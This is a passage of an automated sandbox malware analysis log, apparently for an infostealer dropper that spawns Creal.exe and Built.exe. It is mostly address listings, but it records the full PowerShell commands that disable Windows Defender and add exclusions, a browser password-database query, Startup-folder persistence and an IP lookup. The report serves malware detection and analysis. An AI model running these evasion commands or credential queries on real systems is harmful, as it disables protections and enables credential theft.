              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A42EB05_2_00007FFD89A42EB0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A435205_2_00007FFD89A43520
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A51D305_2_00007FFD89A51D30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A521205_2_00007FFD89A52120
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A61F005_2_00007FFD89A61F00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A621E05_2_00007FFD89A621E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A81F805_2_00007FFD89A81F80
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A923805_2_00007FFD89A92380
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A922705_2_00007FFD89A92270
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89A91D305_2_00007FFD89A91D30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AA22805_2_00007FFD89AA2280
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AA1D305_2_00007FFD89AA1D30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AB21505_2_00007FFD89AB2150
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AC1FE05_2_00007FFD89AC1FE0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89AE22305_2_00007FFD89AE2230
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89D819505_2_00007FFD89D81950
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89D813005_2_00007FFD89D81300
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD89D822705_2_00007FFD89D82270
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0F4C705_2_00007FFD8A0F4C70
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0892B05_2_00007FFD8A0892B0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0922505_2_00007FFD8A092250
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0DBB005_2_00007FFD8A0DBB00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0D4B205_2_00007FFD8A0D4B20
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0C6B405_2_00007FFD8A0C6B40
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A079B905_2_00007FFD8A079B90
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A073C105_2_00007FFD8A073C10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A122BF05_2_00007FFD8A122BF0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0ACC595_2_00007FFD8A0ACC59
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A08CC405_2_00007FFD8A08CC40
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0CCC405_2_00007FFD8A0CCC40
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A07288E5_2_00007FFD8A07288E
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0B58805_2_00007FFD8A0B5880
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A07A8C05_2_00007FFD8A07A8C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0869305_2_00007FFD8A086930
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0D29505_2_00007FFD8A0D2950
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0999A05_2_00007FFD8A0999A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A07FA105_2_00007FFD8A07FA10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0B4E705_2_00007FFD8A0B4E70
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A10CEA05_2_00007FFD8A10CEA0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0ECF305_2_00007FFD8A0ECF30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A124FC05_2_00007FFD8A124FC0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0FBFC05_2_00007FFD8A0FBFC0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0980205_2_00007FFD8A098020
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0970405_2_00007FFD8A097040
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A108C805_2_00007FFD8A108C80
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0FACA05_2_00007FFD8A0FACA0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0CBCC05_2_00007FFD8A0CBCC0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0C0CE05_2_00007FFD8A0C0CE0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A089D005_2_00007FFD8A089D00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A07BD305_2_00007FFD8A07BD30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A09DDB05_2_00007FFD8A09DDB0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A080DC05_2_00007FFD8A080DC0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A08D2B05_2_00007FFD8A08D2B0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0BF2D05_2_00007FFD8A0BF2D0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1342B05_2_00007FFD8A1342B0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A09F2F05_2_00007FFD8A09F2F0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0732F55_2_00007FFD8A0732F5
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A09D3105_2_00007FFD8A09D310
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0FA3005_2_00007FFD8A0FA300
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0773365_2_00007FFD8A077336
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0D73505_2_00007FFD8A0D7350
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A08C3805_2_00007FFD8A08C380
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0E43B05_2_00007FFD8A0E43B0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0741205_2_00007FFD8A074120
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0821E05_2_00007FFD8A0821E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0CE6705_2_00007FFD8A0CE670
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0D06C05_2_00007FFD8A0D06C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0E77505_2_00007FFD8A0E7750
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0E27E65_2_00007FFD8A0E27E6
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0748205_2_00007FFD8A074820
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0DC8405_2_00007FFD8A0DC840
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1154A05_2_00007FFD8A1154A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0794D05_2_00007FFD8A0794D0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0BA5105_2_00007FFD8A0BA510
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0745705_2_00007FFD8A074570
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0CB5B05_2_00007FFD8A0CB5B0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0A15A05_2_00007FFD8A0A15A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0945A05_2_00007FFD8A0945A0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A09E5C05_2_00007FFD8A09E5C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A0836505_2_00007FFD8A083650
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8A1F77485_2_00007FFD8A1F7748
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF226175_2_00007FFD8AF22617
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21A0F5_2_00007FFD8AF21A0F
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF216185_2_00007FFD8AF21618
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF988705_2_00007FFD8AF98870
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF589205_2_00007FFD8AF58920
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21EE25_2_00007FFD8AF21EE2
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2117C5_2_00007FFD8AF2117C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21B545_2_00007FFD8AF21B54
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF9AC805_2_00007FFD8AF9AC80
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2149C5_2_00007FFD8AF2149C
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21CBC5_2_00007FFD8AF21CBC
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21D935_2_00007FFD8AF21D93
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2116D5_2_00007FFD8AF2116D
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF287205_2_00007FFD8AF28720
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF216FE5_2_00007FFD8AF216FE
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2155A5_2_00007FFD8AF2155A
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF65C005_2_00007FFD8AF65C00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF69A605_2_00007FFD8AF69A60
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4BAE05_2_00007FFD8AF4BAE0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6D9805_2_00007FFD8AF6D980
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF215965_2_00007FFD8AF21596
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF221C65_2_00007FFD8AF221C6
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF213DE5_2_00007FFD8AF213DE
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF216545_2_00007FFD8AF21654
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF460305_2_00007FFD8AF46030
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF215465_2_00007FFD8AF21546
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21AD75_2_00007FFD8AF21AD7
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF221E45_2_00007FFD8AF221E4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21FDC5_2_00007FFD8AF21FDC
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6DE505_2_00007FFD8AF6DE50
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF8D2D05_2_00007FFD8AF8D2D0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF217F85_2_00007FFD8AF217F8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF224DC5_2_00007FFD8AF224DC
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF227025_2_00007FFD8AF22702
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF936505_2_00007FFD8AF93650
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21C125_2_00007FFD8AF21C12
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A265CBC5_2_00007FFD9A265CBC
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A2654E85_2_00007FFD9A2654E8
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A2687345_2_00007FFD9A268734
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9A26BF745_2_00007FFD9A26BF74
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DA279505_2_00007FFD9DA27950
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DA27D295_2_00007FFD9DA27D29
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DB546505_2_00007FFD9DB54650
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DB51A005_2_00007FFD9DB51A00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DB555D05_2_00007FFD9DB555D0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DB519205_2_00007FFD9DB51920
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD9DB5F5345_2_00007FFD9DB5F534
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFD93591325 appears 518 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFD9360D425 appears 48 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FF65E282910 appears 34 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FF65E282710 appears 104 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFDA342A490 appears 156 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFD9360D32F appears 324 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFDA33EDB38 appears 46 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFD9360DB03 appears 45 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFDA3429330 appears 119 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFD9360D33B appears 39 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFDA33EDC68 appears 68 times
              Source: C:\Users\user\Desktop\Built.exeCode function: String function: 00007FFD9360D341 appears 1189 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8AF9D425 appears 48 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8AF9D32F appears 327 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8AF9DB03 appears 45 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8AF9D33B appears 43 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8AF9D341 appears 1198 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FF6D9242910 appears 34 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8AF21325 appears 472 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8A079340 appears 135 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8A07A500 appears 163 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FF6D9242710 appears 104 times
              Source: C:\Users\user\Desktop\Creal.exeCode function: String function: 00007FFD8A0A1E20 appears 33 times
              Source: unicodedata.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: _overlapped.pyd.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: rar.exe.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.3.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.24.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: _overlapped.pyd.24.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: python3.dll.24.drStatic PE information: No import functions for PE file found
              Source: python3.dll.2.drStatic PE information: No import functions for PE file found
              Source: libcrypto-3.dll.3.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
              Source: libssl-3.dll.3.drStatic PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
              Source: python312.dll.3.drStatic PE information: Section: UPX1 ZLIB complexity 0.9993225025765606
              Source: sqlite3.dll.3.drStatic PE information: Section: UPX1 ZLIB complexity 0.9973947832661291
              Source: unicodedata.pyd.3.drStatic PE information: Section: UPX1 ZLIB complexity 0.9935825892857143
              Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@45/226@6/6
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF606383BF8 GetLastError,FormatMessageW,LocalFree,0_2_00007FF606383BF8
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639C260 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00007FF60639C260
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_5019218Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5200:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1396:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6404:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
              Source: C:\Users\user\Desktop\Built.exeMutant created: \Sessions\1\BaseNamedObjects\Z
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
              Source: C:\Users\user\Desktop\Creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI56762Jump to behavior
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile read: C:\Windows\win.iniJump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: Creal.exe, 00000005.00000002.2425292105.00000203E8110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT action_url, username_value, password_value FROM logins;
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmp, Creal.exeBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: Built.exe, Built.exe, 00000004.00000002.2198401846.00007FFDA3421000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeReversingLabs: Detection: 31%
              Source: Built.exeString found in binary or memory: id-cmc-addExtensions
              Source: Built.exeString found in binary or memory: set-addPolicy
              Source: Built.exeString found in binary or memory: can't send non-None value to a just-started coroutine
              Source: Built.exeString found in binary or memory: --help
              Source: Built.exeString found in binary or memory: --help
              Source: Built.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: Built.exeString found in binary or memory: can't send non-None value to a just-started async generator
              Source: Built.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
              Source: Built.exeString found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeFile read: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe "C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe"
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe"
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe"
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe"
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "curl ifconfig.me"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl ifconfig.me
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe" Jump to behavior
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Creal.exeProcess created: C:\Users\user\Desktop\Creal.exe "C:\Users\user\Desktop\Creal.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Users\user\Desktop\Built.exe "C:\Users\user\Desktop\Built.exe" Jump to behavior
              Source: C:\Users\user\Desktop\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'"Jump to behavior
